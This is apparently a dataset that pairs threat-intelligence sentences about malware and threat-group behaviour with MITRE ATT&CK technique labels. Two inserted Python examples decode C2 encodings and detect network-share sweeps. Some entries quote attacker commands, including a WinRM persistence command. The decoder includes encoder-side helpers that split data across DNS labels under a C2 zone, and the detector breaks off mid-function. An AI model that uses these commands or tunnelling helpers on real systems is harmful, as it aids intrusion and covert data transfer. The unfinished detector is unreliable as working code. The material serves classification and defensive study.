{"text1":"During Frankenstein, the threat actors used MSbuild to execute an actor-created file.","labels":"['T1127.001']"}
|
|
{"text1":"Astaroth uses the LoadLibraryExW() function to load additional modules.","labels":"['T1129']"}
|
|
{"text1":"Attor's dispatcher can execute additional plugins by loading the respective DLLs.","labels":"['T1129']"}
|
|
{"text1":"BLINDINGCAN has loaded and executed DLLs in memory during runtime on a victim machine.","labels":"['T1129']"}
|
|
{"text1":"BOOSTWRITE has used the DWriteCreateFactory() function to load additional modules.","labels":"['T1129']"}
|
|
{"text1":"Bumblebee can use `LoadLibrary` to attempt to execute GdiPlus.dll.","labels":"['T1129']"}
|
|
{"text1":"Dtrack contains a function that calls \"LoadLibrary\" and \"GetProcAddress\".","labels":"['T1129']"}
|
|
{"text1":"FoggyWeb's loader can call the \"load()\" function to load the FoggyWeb dll into an Application Domain on a compromised AD FS server.","labels":"['T1129']"}
|
|
{"text1":"Hydraq creates a backdoor through which remote attackers can load and call DLL functions.","labels":"['T1129']"}
|
|
{"text1":"KillDisk loads and executes functions from a DLL.","labels":"['T1129']"}
|
|
{"text1":"Metamorfo has used AutoIt to load and execute the DLL payload.","labels":"['T1129']"}
|
|
{"text1":"PipeMon has used a call to \"LoadLibrary\" to load its installer. PipeMon loads its modules using reflective loading or custom shellcode.","labels":"['T1129']"}
|
|
{"text1":"Stuxnet calls LoadLibrary then executes exports from a DLL.","labels":"['T1129']"}
|
|
{"text1":"TajMahal has the ability to inject the \"LoadLibrary\" call template DLL into running processes.","labels":"['T1129']"}
|
|
{"text1":"gh0st RAT can load DLLs into memory.","labels":"['T1129']"}
|
|
{"text1":"After encrypting C2 data, BADNEWS converts it into a hexadecimal representation and then encodes it into base64.","labels":"['T1132']"}
|
|
{"text1":"H1N1 obfuscates C2 traffic with an altered version of base64.","labels":"['T1132']"}
|
|
{"text1":"Linux Rabbit sends the payload from the C2 server as an encoded URL parameter.","labels":"['T1132']"}
|
|
{"text1":"Mythic provides various transform functions to encode and\/or randomize C2 data.","labels":"['T1132']"}
|
|
{"text1":"Ursnif has used encoded data in HTTP URLs for C2.","labels":"['T1132']"}
|
|
{"text1":"A JHUHUGIT variant encodes C2 POST data with base64.","labels":"['T1132.001']"}
|
|
{"text1":"APT33 has used base64 to encode command and control traffic.","labels":"['T1132.001']"}
|
|
{"text1":"An APT19 HTTP malware variant used Base64 to encode communications to the C2 server.","labels":"['T1132.001']"}
|
|
{"text1":"Astaroth encodes data using Base64 before sending it to the C2 server.","labels":"['T1132.001']"}
|
|
{"text1":"AutoIt backdoor has sent a C2 response that was base64-encoded.","labels":"['T1132.001']"}
|
|
{"text1":"BADNEWS encodes C2 traffic with base64.","labels":"['T1132.001']"}
|
|
{"text1":"BS2005 uses Base64 encoding for communication in the message body of an HTTP request.","labels":"['T1132.001']"}
|
|
{"text1":"BabyShark has encoded data using certutil before exfiltration.","labels":"['T1132.001']"}
|
|
{"text1":"Bisonal has encoded binary data with Base64 and ASCII.","labels":"['T1132.001']"}
|
|
{"text1":"Bumblebee has the ability to base64 encode C2 server responses.","labels":"['T1132.001']"}
|
|
{"text1":"C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding.","labels":"['T1132.001']"}
|
|
{"text1":"Carbanak encodes the message body of HTTP traffic with Base64.","labels":"['T1132.001']"}
|
|
{"text1":"ChChes can encode C2 data with a custom technique that utilizes Base64.","labels":"['T1132.001']"}
|
|
{"text1":"Chaes has used Base64 to encode C2 communications.","labels":"['T1132.001']"}
|
|
{"text1":"CharmPower can send additional modules over C2 encoded with base64.","labels":"['T1132.001']"}
|
|
{"text1":"Cobian RAT obfuscates communications with the C2 server using Base64 encoding.","labels":"['T1132.001']"}
|
|
{"text1":"CreepySnail can use Base64 to encode its C2 traffic.","labels":"['T1132.001']"}
|
|
{"text1":"DarkWatchman encodes data using hexadecimal representation before sending it to the C2 server.","labels":"['T1132.001']"}
|
|
{"text1":"Daserf uses custom base64 encoding to obfuscate HTTP traffic.","labels":"['T1132.001']"}
|
|
{"text1":"Denis encodes the data sent to the server in Base64.","labels":"['T1132.001']"}
|
|
{"text1":"Dipsind encodes C2 traffic with base64.","labels":"['T1132.001']"}
|
|
{"text1":"DnsSystem can Base64 encode data sent to C2.","labels":"['T1132.001']"}
|
|
{"text1":"Ebury has encoded C2 traffic in hexadecimal format.","labels":"['T1132.001']"}
|
|
{"text1":"Elise exfiltrates data using cookie values that are Base64-encoded.","labels":"['T1132.001']"}
|
|
{"text1":"For C2 over HTTP, Helminth encodes data with base64 and sends it via the \"Cookie\" field of HTTP requests. For C2 over DNS, Helminth converts ASCII characters into their hexadecimal values and sends the data in cleartext.","labels":"['T1132.001']"}
|
|
{"text1":"Fysbis can use Base64 to encode its C2 traffic.","labels":"['T1132.001']"}
|
|
{"text1":"GrimAgent can base64 encode C2 replies.","labels":"['T1132.001']"}
|
|
{"text1":"HAFNIUM has used ASCII encoding for C2 traffic.","labels":"['T1132.001']"}
|
|
{"text1":"HOPLIGHT has utilized Zlib compression to obfuscate the communications payload.","labels":"['T1132.001']"}
|
|
{"text1":"Ixeshe uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.","labels":"['T1132.001']"}
|
|
{"text1":"KONNI has used a custom base64 key to encode stolen data before exfiltration.","labels":"['T1132.001']"}
|
|
{"text1":"Kazuar encodes communications to the C2 server in Base64.","labels":"['T1132.001']"}
|
|
{"text1":"Kessel has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.","labels":"['T1132.001']"}
|
|
{"text1":"Kevin can Base32 encode chunks of output files during exfiltration.","labels":"['T1132.001']"}
|
|
{"text1":"Machete has used base64 encoding.","labels":"['T1132.001']"}
|
|
{"text1":"MechaFlounder has the ability to use base16 encoded strings in C2.","labels":"['T1132.001']"}
|
|
{"text1":"Mis-Type uses Base64 encoding for C2 traffic.","labels":"['T1132.001']"}
|
|
{"text1":"Misdat network traffic is Base64-encoded plaintext.","labels":"['T1132.001']"}
|
|
{"text1":"Mongall can use Base64 to encode information sent to its C2.","labels":"['T1132.001']"}
|
|
{"text1":"More_eggs has used basE91 encoding, along with encryption, for C2 communication.","labels":"['T1132.001']"}
|
|
{"text1":"Mori can use Base64-encoded JSON libraries in its C2 communications.","labels":"['T1132.001']"}
|
|
{"text1":"MuddyWater has used tools to encode C2 communications including Base64 encoding.","labels":"['T1132.001']"}
|
|
{"text1":"Octopus has encoded C2 communications in Base64.","labels":"['T1132.001']"}
|
|
{"text1":"Okrum has used base64 to encode C2 communication.","labels":"['T1132.001']"}
|
|
{"text1":"Patchwork used Base64 to encode C2 traffic.","labels":"['T1132.001']"}
|
|
{"text1":"PingPull can encode C2 traffic with Base64.","labels":"['T1132.001']"}
|
|
{"text1":"PowerShower has the ability to encode C2 communications with base64 encoding.","labels":"['T1132.001']"}
|
|
{"text1":"Prikormka encodes C2 traffic with Base64.","labels":"['T1132.001']"}
|
|
{"text1":"QUADAGENT encodes C2 communications with base64.","labels":"['T1132.001']"}
|
|
{"text1":"QakBot can Base64 encode system information sent to C2.","labels":"['T1132.001']"}
|
|
{"text1":"RDAT can communicate with the C2 via base32-encoded subdomains.","labels":"['T1132.001']"}
|
|
{"text1":"Ramsay has used base64 to encode its C2 traffic.","labels":"['T1132.001']"}
|
|
{"text1":"Responses from the Pisloader C2 server are base32-encoded.","labels":"['T1132.001']"}
|
|
{"text1":"RogueRobin base64 encodes strings that are sent to the C2 over its DNS tunnel.","labels":"['T1132.001']"}
|
|
{"text1":"SMOKEDHAM has encoded its C2 traffic with Base64.","labels":"['T1132.001']"}
|
|
{"text1":"STARWHALE has the ability to hex-encode collected data from an infected host.","labels":"['T1132.001']"}
|
|
{"text1":"Sandworm Team's BCS-server tool uses base64 encoding and HTML tags for communication traffic with the C2 server.","labels":"['T1132.001']"}
|
|
{"text1":"SeaDuke C2 traffic is base64-encoded.","labels":"['T1132.001']"}
|
|
{"text1":"Several BRONZE BUTLER tools encode data with base64 when posting it to a C2 server.","labels":"['T1132.001']"}
|
|
{"text1":"SideTwist has used Base64 for encoded C2 traffic.","labels":"['T1132.001']"}
|
|
{"text1":"Sliver can use standard encoding techniques like gzip and hex to ASCII to encode the C2 communication payload.","labels":"['T1132.001']"}
|
|
{"text1":"Some Backdoor.Oldrea samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.","labels":"['T1132.001']"}
|
|
{"text1":"Some Felismus samples use a custom method for C2 traffic that utilizes Base64.","labels":"['T1132.001']"}
|
|
{"text1":"Squirrelwaffle has encoded its communications to C2 servers using Base64.","labels":"['T1132.001']"}
|
|
{"text1":"Stuxnet transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value.","labels":"['T1132.001']"}
|
|
{"text1":"TA551 has used encoded ASCII text for initial C2 communications.","labels":"['T1132.001']"}
|
|
{"text1":"TrickBot can Base64-encode C2 commands.","labels":"['T1132.001']"}
|
|
{"text1":"Tropic Trooper has used base64 encoding to hide command strings delivered from the C2.","labels":"['T1132.001']"}
|
|
{"text1":"Valak has returned C2 data as encoded ASCII.","labels":"['T1132.001']"}
|
|
{"text1":"WellMess has used Base64 encoding to uniquely identify communication to and from the C2.","labels":"['T1132.001']"}
|
|
{"text1":"Zebrocy has used URL\/Percent Encoding on data exfiltrated via HTTP POST requests.","labels":"['T1132.001']"}
|
|
{"text1":"down_new has the ability to base64 encode C2 communications.","labels":"['T1132.001']"}
|
|
{"text1":"gh0st RAT has used Zlib to compress C2 communications data before encrypting it.","labels":"['T1132.001']"}
|
|
{"text1":"njRAT uses Base64 encoding for C2 traffic.","labels":"['T1132.001']"}
|
|
{"text1":"xCaon has used Base64 to encode its C2 traffic.","labels":"['T1132.001']"}
|
|
{"text1":"Cyclops Blink can use a custom binary scheme to encode messages with specific commands and parameters to be executed.","labels":"['T1132.002']"}
|
|
{"text1":"InvisiMole can use a modified base32 encoding to encode data within the subdomain of C2 requests.","labels":"['T1132.002']"}
|
|
{"text1":"Newer variants of BACKSPACE will encode C2 communications with a custom system.","labels":"['T1132.002']"}
|
|
{"text1":"PowGoop can use a modified Base64 encoding mechanism to send data to and from the C2 server.","labels":"['T1132.002']"}
|
|
{"text1":"RDAT can communicate with the C2 via subdomains that utilize base64 with character substitutions.","labels":"['T1132.002']"}
|
|
{"text1":"ShadowPad has encoded data as readable Latin characters.","labels":"['T1132.002']"}
|
|
{"text1":"Small Sieve can use a custom hex byte swapping encoding scheme to obfuscate tasking traffic.","labels":"['T1132.002']"}
|
|
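The T1132 entries above describe the same few layers again and again: base64 in an HTTP Cookie (Helminth), hex in DNS labels (Kessel), base32 subdomains (Pisloader, RDAT) and substituted base64 alphabets (PowGoop and RDAT under T1132.002). The Python below is an added example written for this page, not code from any of those families: it peels a standard layer off a captured token, reassembles a payload that was split across DNS labels, and inverts a custom base64 alphabet once that alphabet has been recovered from samples. The beacon plaintext, the C2 zone `update.example.test` and the rotated alphabet are constructed assumptions.

```python
"""Added example (not code from any family listed above): peel the encoding
layer off a C2 artifact and recover a substituted-alphabet base64 payload."""
import base64
import binascii
import string

STD_B64 = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
# Assumed custom alphabet for the T1132.002 case: the standard table rotated by 13.
# Real families use their own substitution; recover it from samples, then reuse
# decode_custom_base64() unchanged.
CUSTOM_B64 = STD_B64[13:] + STD_B64[:13]
B32_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=")

PLAINTEXT = b"host=ws01;user=alice"     # constructed beacon content
C2_DOMAIN = "update.example.test"        # assumed C2 zone, constructed


def _pad(s: str, block: int) -> str:
    """Restore the '=' padding that tunnels often strip to save space."""
    return s + "=" * (-len(s) % block)


def _printable_ratio(data: bytes) -> float:
    if not data:
        return 0.0
    return sum(32 <= b < 127 or b in b"\r\n\t" for b in data) / len(data)


def decode_layer(token: str) -> tuple:
    """Try hex, base32 and both base64 alphabets; return (layer, bytes) for the
    candidate whose output is mostly printable, or ("unknown", b"")."""
    t = token.strip()
    candidates = []
    if t and len(t) % 2 == 0 and all(c in string.hexdigits for c in t):
        candidates.append(("hex", binascii.unhexlify(t)))
    up = t.upper()
    if up and all(c in B32_ALPHABET for c in up):
        try:
            candidates.append(("base32", base64.b32decode(_pad(up, 8))))
        except binascii.Error:
            pass
    for name, s in (("base64", t), ("base64url", t.replace("-", "+").replace("_", "/"))):
        try:
            candidates.append((name, base64.b64decode(_pad(s, 4), validate=True)))
        except (binascii.Error, ValueError):
            pass
    if not candidates:
        return ("unknown", b"")
    best = max(candidates, key=lambda c: _printable_ratio(c[1]))
    return best if _printable_ratio(best[1]) >= 0.9 else ("unknown", b"")


def encode_custom_base64(data: bytes, alphabet: str) -> str:
    """Tunnel-client side of T1132.002: standard base64, then swap the alphabet."""
    return base64.b64encode(data).decode().translate(str.maketrans(STD_B64, alphabet))


def decode_custom_base64(token: str, alphabet: str) -> bytes:
    """Map the substituted alphabet back onto the standard table, then decode."""
    std = token.strip().translate(str.maketrans(alphabet, STD_B64))
    return base64.b64decode(_pad(std, 4), validate=True)


def build_dns_query(payload: str, c2_domain: str) -> str:
    """Split a payload across 63-character labels under the C2 zone."""
    labels = [payload[i:i + 63] for i in range(0, len(payload), 63)]
    return ".".join(labels + [c2_domain])


def dns_payload(fqdn: str, c2_domain: str) -> str:
    """Strip the zone and re-join the data labels (analyst side)."""
    fqdn, zone = fqdn.rstrip("."), c2_domain.rstrip(".")
    if not fqdn.lower().endswith("." + zone.lower()):
        raise ValueError("query is not under the C2 zone")
    return "".join(fqdn[: -len(zone) - 1].split("."))


# Constructed samples, one per encoding style from the entries above.
SAMPLES = {
    # Helminth-style: base64 carried in the HTTP Cookie header
    "http_cookie": base64.b64encode(PLAINTEXT).decode(),
    # Kessel-style: hex in DNS subdomain labels
    "dns_hex": build_dns_query(PLAINTEXT.hex(), C2_DOMAIN),
    # Pisloader/RDAT-style: base32 in DNS subdomain labels
    "dns_base32": build_dns_query(base64.b32encode(PLAINTEXT).decode(), C2_DOMAIN),
    # PowGoop-style substituted base64 alphabet (T1132.002)
    "custom_b64": encode_custom_base64(PLAINTEXT, CUSTOM_B64),
}

if __name__ == "__main__":
    for name, token in SAMPLES.items():
        raw = dns_payload(token, C2_DOMAIN) if name.startswith("dns") else token
        print(f"{name:12} {decode_layer(raw)}")
    print("custom_b64 with recovered alphabet:",
          decode_custom_base64(SAMPLES["custom_b64"], CUSTOM_B64))
```

DNS names are case-insensitive and resolvers may rewrite label case, which is why the DNS tunnels in the entries above favour base32 and hex over base64; `dns_payload()` therefore matches the zone case-insensitively but leaves the data labels untouched. `decode_layer()` ranks candidates by how printable the output is, so for the substituted alphabet a standard decoder answers `unknown` instead of returning wrong bytes.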
{"text1":"APT28 has used Tor and a variety of commercial VPN services to route brute force authentication attempts.","labels":"['T1133']"}
|
|
{"text1":"APT29 has used compromised identities to access networks via SSH, VPNs, and other remote access tools.","labels":"['T1133']"}
|
|
{"text1":"APT34 uses remote services such as VPN, Citrix, or OWA to persist in an environment.","labels":"['T1133']"}
|
|
{"text1":"APT41 compromised an online billing\/payment service using VPN access between a third-party service provider and the targeted payment service.","labels":"['T1133']"}
|
|
{"text1":"Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services.","labels":"['T1133']"}
|
|
{"text1":"Doki was executed through an open Docker daemon API port.","labels":"['T1133']"}
|
|
{"text1":"Dragonfly 2.0 used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.","labels":"['T1133']"}
|
|
{"text1":"Dragonfly has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.","labels":"['T1133']"}
|
|
{"text1":"Dragonfly used remote access services, including VPN and Outlook Web Access (OWA).","labels":"['T1133']"}
|
|
{"text1":"During CostaRicto, the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment.","labels":"['T1133']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors enabled WinRM over HTTP\/HTTPS as a backup persistence mechanism using the following command: `cscript \/\/nologo \"C:\\Windows\\System32\\winrm.vbs\" set winrm\/config\/service@{EnableCompatibilityHttpsListener=\"true\"}`.","labels":"['T1133']"}
|
|
{"text1":"During Operation Wocao, threat actors used stolen credentials to connect to the victim's network via VPN.","labels":"['T1133']"}
|
|
{"text1":"GALLIUM has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments.","labels":"['T1133']"}
|
|
{"text1":"GOLD SOUTHFIELD has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines.","labels":"['T1133']"}
|
|
{"text1":"Ke3chang has gained access through VPNs including with compromised accounts and stolen VPN certificates.","labels":"['T1133']"}
|
|
{"text1":"Kimsuky has used RDP to establish persistence.","labels":"['T1133']"}
|
|
{"text1":"LAPSUS$ has gained access to internet-facing systems and applications, including virtual private network (VPN), remote desktop protocol (RDP), and virtual desktop infrastructure (VDI) including Citrix.","labels":"['T1133']"}
|
|
{"text1":"Leviathan has used external remote services such as virtual private networks (VPN) to gain initial access.","labels":"['T1133']"}
|
|
{"text1":"Linux Rabbit attempts to gain access to the server via SSH.","labels":"['T1133']"}
|
|
{"text1":"OilRig uses remote services such as VPN, Citrix, or OWA to persist in an environment.","labels":"['T1133']"}
|
|
{"text1":"Operation Wocao has used stolen credentials to connect to the victim's network via VPN.","labels":"['T1133']"}
|
|
{"text1":"Sandworm Team has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. Sandworm Team has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users.","labels":"['T1133']"}
|
|
{"text1":"TEMP.Veles has used a VPN to persist in the victim environment.","labels":"['T1133']"}
|
|
{"text1":"TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments. TeamTNT has also targeted exposed kubelets for Kubernetes environments.","labels":"['T1133']"}
|
|
{"text1":"Threat Group-3390 actors look for and use VPN profiles during an operation to access the network using external VPN services. Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.","labels":"['T1133']"}
|
|
{"text1":"UNC2452 has used compromised identities to access VPNs and remote access tools.","labels":"['T1133']"}
|
|
{"text1":"AppleSeed can gain system-level privileges by passing \"SeDebugPrivilege\" to the \"AdjustTokenPrivileges\" API.","labels":"['T1134']"}
|
|
{"text1":"Blue Mockingbird has used JuicyPotato to abuse the \"SeImpersonatePrivilege\" token privilege to escalate from web application pool accounts to NT Authority\\SYSTEM.","labels":"['T1134']"}
|
|
{"text1":"Duqu examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.","labels":"['T1134']"}
|
|
{"text1":"Empire can use PowerSploit's \"Invoke-TokenManipulation\" to manipulate access tokens.","labels":"['T1134']"}
|
|
{"text1":"FIN6 has used Metasploit\u2019s named-pipe impersonation technique to escalate privileges.","labels":"['T1134']"}
|
|
{"text1":"Gelsemium can use token manipulation to bypass UAC on Windows 7 systems.","labels":"['T1134']"}
|
|
{"text1":"HermeticWiper can use `AdjustTokenPrivileges` to grant itself privileges for debugging with `SeDebugPrivilege`, creating backups with `SeBackupPrivilege`, loading drivers with `SeLoadDriverPrivilege`, and shutting down a local system with `SeShutdownPrivilege`.","labels":"['T1134']"}
|
|
{"text1":"Hydraq creates a backdoor through which remote attackers can adjust token privileges.","labels":"['T1134']"}
|
|
{"text1":"PowerSploit's \"Invoke-TokenManipulation\" Exfiltration module can be used to manipulate tokens.","labels":"['T1134']"}
|
|
{"text1":"Ryuk has attempted to adjust its token privileges to have the \"SeDebugPrivilege\".","labels":"['T1134']"}
|
|
{"text1":"SUNSPOT modified its security token to grant itself debugging privileges by adding \"SeDebugPrivilege\".","labels":"['T1134']"}
|
|
{"text1":"Sliver has the ability to manipulate user tokens on targeted Windows systems.","labels":"['T1134']"}
|
|
{"text1":"SslMM contains a feature to manipulate process privileges and tokens.","labels":"['T1134']"}
|
|
{"text1":"APT28 has used CVE-2015-1701 to access the SYSTEM token and copy it into the current process as part of privilege escalation.","labels":"['T1134.001']"}
|
|
{"text1":"BitPaymer can use the tokens of users to create processes on infected systems.","labels":"['T1134.001']"}
|
|
{"text1":"Cobalt Strike can steal access tokens from existing processes.","labels":"['T1134.001']"}
|
|
{"text1":"FinFisher uses token manipulation with NtFilterToken as part of UAC bypass.","labels":"['T1134.001']"}
|
|
{"text1":"Okrum can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.","labels":"['T1134.001']"}
|
|
{"text1":"Pupy can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.","labels":"['T1134.001']"}
|
|
{"text1":"SILENTTRINITY can find a process owned by a specific user and impersonate the associated token.","labels":"['T1134.001']"}
|
|
{"text1":"Shamoon can impersonate tokens using \"LogonUser\", \"ImpersonateLoggedOnUser\", and \"ImpersonateNamedPipeClient\".","labels":"['T1134.001']"}
|
|
{"text1":"Siloscape impersonates the main thread of \"CExecSvc.exe\" by calling \"NtImpersonateThread\".","labels":"['T1134.001']"}
|
|
{"text1":"Stuxnet attempts to impersonate an anonymous token to enumerate bindings in the service control manager.","labels":"['T1134.001']"}
|
|
{"text1":"Tarrask leverages token theft to obtain `lsass.exe` security permissions.","labels":"['T1134.001']"}
|
|
{"text1":"Aria-body has the ability to execute a process using \"runas\".","labels":"['T1134.002']"}
|
|
{"text1":"Azorult can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.","labels":"['T1134.002']"}
|
|
{"text1":"Bankshot grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user.","labels":"['T1134.002']"}
|
|
{"text1":"KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.","labels":"['T1134.002']"}
|
|
{"text1":"Lazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call \"CreateProcessAsUserA\" under that user's context.","labels":"['T1134.002']"}
|
|
{"text1":"PipeMon can attempt to gain administrative privileges using token impersonation.","labels":"['T1134.002']"}
|
|
{"text1":"PoshC2 can use Invoke-RunAs to make tokens.","labels":"['T1134.002']"}
|
|
{"text1":"REvil can launch an instance of itself with administrative rights using runas.","labels":"['T1134.002']"}
|
|
{"text1":"ZxShell has a command called RunAs, which creates a new process as another user or process context.","labels":"['T1134.002']"}
|
|
{"text1":"Cobalt Strike can make tokens from known credentials.","labels":"['T1134.003']"}
|
|
{"text1":"Cobalt Strike can spawn processes with alternate PPIDs.","labels":"['T1134.004']"}
|
|
{"text1":"KONNI has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`.","labels":"['T1134.004']"}
|
|
{"text1":"Empire can add a SID-History to a user if on a domain controller.","labels":"['T1134.005']"}
|
|
{"text1":"Mimikatz's \"MISC::AddSid\" module can append any SID or user\/group account to a user's SID-History. Mimikatz also utilizes SID-History Injection to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.","labels":"['T1134.005']"}
|
|
{"text1":"APT1 listed connected network shares.","labels":"['T1135']"}
|
|
{"text1":"APT32 used the \"net view\" command to show all shares available, including the administrative shares such as \"C$\" and \"ADMIN$\".","labels":"['T1135']"}
|
|
{"text1":"APT38 has enumerated network shares on a compromised host.","labels":"['T1135']"}
|
|
{"text1":"APT39 has used the post exploitation tool CrackMapExec to enumerate network shares.","labels":"['T1135']"}
|
|
{"text1":"APT41 used the \"net share\" command as part of network reconnaissance.","labels":"['T1135']"}
|
|
{"text1":"Avaddon has enumerated shared folders and mapped volumes.","labels":"['T1135']"}
|
|
{"text1":"Bazar can enumerate shared drives on the domain.","labels":"['T1135']"}
|
|
{"text1":"Chimera has used \"net share\" and \"net view\" to identify network shares of interest.","labels":"['T1135']"}
|
|
{"text1":"Clambling has the ability to enumerate network shares.","labels":"['T1135']"}
|
|
{"text1":"Cobalt Strike can query shared drives on the local system.","labels":"['T1135']"}
|
|
{"text1":"Conti can enumerate remote open SMB network shares using \"NetShareEnum()\".","labels":"['T1135']"}
|
|
{"text1":"Cuba can discover shared resources using the \"NetShareEnum\" API call.","labels":"['T1135']"}
|
|
{"text1":"DarkVishnya scanned the network for public shared folders.","labels":"['T1135']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors used the `net share` command as part of their advanced reconnaissance.","labels":"['T1135']"}
|
|
{"text1":"During Operation Wocao, threat actors discovered network disks mounted to the system using netstat.","labels":"['T1135']"}
|
|
{"text1":"Empire can find shared drives on the local system.","labels":"['T1135']"}
|
|
{"text1":"FIVEHANDS can enumerate network shares and mounted drives on a network.","labels":"['T1135']"}
|
|
{"text1":"HELLOKITTY has the ability to enumerate network resources.","labels":"['T1135']"}
|
|
{"text1":"Koadic can scan the local network for open SMB.","labels":"['T1135']"}
|
|
{"text1":"Kwampirs collects a list of network shares with the command \"net share\".","labels":"['T1135']"}
|
|
{"text1":"Olympic Destroyer will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares.","labels":"['T1135']"}
|
|
{"text1":"PlugX has a module to enumerate network shares.","labels":"['T1135']"}
|
|
{"text1":"Pupy can list local and remote shared drives and folders over SMB.","labels":"['T1135']"}
|
|
{"text1":"QakBot can use \"net share\" to identify network shares for use in lateral movement.","labels":"['T1135']"}
|
|
{"text1":"QuietSieve can identify and search networked drives for specific file name extensions.","labels":"['T1135']"}
|
|
{"text1":"SILENTTRINITY can enumerate shares on a compromised host.","labels":"['T1135']"}
|
|
{"text1":"Stuxnet enumerates the directories of a network resource.","labels":"['T1135']"}
|
|
{"text1":"The \"net view \\\\remotesystem\" and \"net share\" commands in Net can be used to find shared drives and directories on remote and local systems respectively.","labels":"['T1135']"}
|
|
{"text1":"Tonto Team has used tools such as NBTscan to enumerate network shares.","labels":"['T1135']"}
|
|
{"text1":"TrickBot module shareDll\/mshareDll discovers network shares via the WNetOpenEnumA API.","labels":"['T1135']"}
|
|
{"text1":"Tropic Trooper used \"netview\" to scan target systems for shared resources.","labels":"['T1135']"}
|
|
{"text1":"WastedLocker can identify network adjacent and accessible drives.","labels":"['T1135']"}
|
|
{"text1":"WhisperGate can enumerate connected remote logical drives.","labels":"['T1135']"}
|
|
{"text1":"Wizard Spider has used the \u201cnet view\u201d command to locate mapped network shares.","labels":"['T1135']"}
|
|
{"text1":"Zebrocy identifies network drives when they are added to victim systems.","labels":"['T1135']"}
|
|
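Most T1135 entries above reduce to a handful of command lines: `net share` for local shares, `net view \\host` for a remote host's shares, and scanners such as NBTscan. The Python below is an added example, not code from any listed tool: it classifies process-creation records and raises an alert when one user enumerates shares on several distinct hosts within a short window, the sweep pattern in the DarkVishnya and Koadic entries. The Sysmon-style records, hostnames, threshold and window are constructed.

```python
"""Added example (not any listed tool's code): classify share-discovery command
lines from process-creation telemetry and flag one actor sweeping many hosts."""
from collections import defaultdict
from datetime import datetime, timedelta

NET_IMAGES = {"net.exe", "net1.exe"}

# Constructed Sysmon Event ID 1-style records; hosts, users and times are made up.
EVENTS = [
    {"ts": "2024-05-01T09:00:01", "host": "WS01", "user": "CORP\\alice",
     "image": "C:\\Windows\\System32\\net.exe", "cmd": "net view \\\\FS01"},
    # net.exe re-spawns net1.exe with the same arguments: same target, counted once
    {"ts": "2024-05-01T09:00:04", "host": "WS01", "user": "CORP\\alice",
     "image": "C:\\Windows\\System32\\net1.exe", "cmd": "C:\\Windows\\system32\\net1 view \\\\FS01"},
    {"ts": "2024-05-01T09:00:30", "host": "WS01", "user": "CORP\\alice",
     "image": "C:\\Windows\\System32\\net.exe", "cmd": "\"C:\\Windows\\System32\\net.exe\" view \\\\fs02 /all"},
    {"ts": "2024-05-01T09:01:10", "host": "WS01", "user": "CORP\\alice",
     "image": "C:\\Windows\\System32\\net.exe", "cmd": "net share"},
    {"ts": "2024-05-01T09:02:15", "host": "WS01", "user": "CORP\\alice",
     "image": "C:\\Windows\\System32\\net.exe", "cmd": "net view \\\\DC01"},
    {"ts": "2024-05-01T11:30:00", "host": "WS02", "user": "CORP\\bob",
     "image": "C:\\Windows\\System32\\net.exe", "cmd": "net view \\\\FS01"},
    {"ts": "2024-05-01T11:30:05", "host": "WS02", "user": "CORP\\bob",
     "image": "C:\\Windows\\System32\\NETSTAT.EXE", "cmd": "netstat -an"},
    {"ts": "2024-05-01T13:00:00", "host": "WS03", "user": "CORP\\svc_backup",
     "image": "C:\\Users\\Public\\nbtscan.exe", "cmd": "nbtscan.exe 10.10.0.0/24"},
]


def _verb(token: str) -> str:
    # '"C:\Windows\System32\net.exe"' -> 'net'; 'net1' -> 'net1'
    name = token.strip('"').rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify(event: dict):
    """Return (category, remote_target_or_None), or None if not share discovery."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parts = event["cmd"].split()
    if image in NET_IMAGES and len(parts) >= 2 and _verb(parts[0]) in ("net", "net1"):
        sub = parts[1].lower()
        if sub == "share":
            return ("local_share_enum", None)          # local shares
        if sub == "view":
            targets = [p.lstrip("\\").upper() for p in parts[2:] if p.startswith("\\\\")]
            # 'net view \\host' lists that host's shares; bare 'net view' browses the domain
            return ("remote_share_enum", targets[0]) if targets else ("domain_browse", None)
        return None
    if image == "nbtscan.exe":
        return ("netbios_scan", None)
    # netstat (mounted disks, Operation Wocao) is too common to alert on by itself
    return None


def detect_share_sweeps(events, threshold=3, window_minutes=5):
    """Alert when one (host, user) enumerates shares on >= threshold distinct
    remote hosts inside the window."""
    window = timedelta(minutes=window_minutes)
    per_actor = defaultdict(list)
    for e in events:
        hit = classify(e)
        if hit and hit[0] == "remote_share_enum":
            per_actor[(e["host"], e["user"])].append((datetime.fromisoformat(e["ts"]), hit[1]))
    alerts = []
    for actor, hits in per_actor.items():
        hits.sort()
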